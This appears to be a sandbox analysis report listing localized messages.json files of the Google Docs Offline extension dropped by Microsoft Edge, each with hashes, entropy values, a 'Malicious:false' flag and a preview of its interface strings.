                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):936
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3830
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1898
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):878
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2766
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):978
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):907
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):937
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1337
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2846
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):934
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

